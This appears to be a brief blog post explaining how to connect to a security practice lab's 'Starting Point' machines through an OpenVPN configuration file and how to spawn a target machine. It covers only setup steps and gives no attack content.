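After logging in, click Lab --> STARTING POINT on the right-hand side.
Click the first one.
Connect using the OpenVPN configuration file
Download the configuration file
Use the configuration file
Download the OpenVPN client: https://openvpn.net/
Usage:
openvpn xxx.ovpn
Usage: after installing the client, import the downloaded configuration file, then click Connect.
Start the target machine. Click Start point in the upper-left corner to view the current connection status. Once you are connected, you can start the target machine.
Click spawn machine to power it on.
Wait a moment until an IP address appears, then you can begin testing. The buttons after it are restart and shut down, respectively.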
Author: Hao
Copyright notice: Unless otherwise stated, all articles on this blog are licensed under CC BY-NC-SA 4.0. Please credit the source Hao DevSecOps when reposting!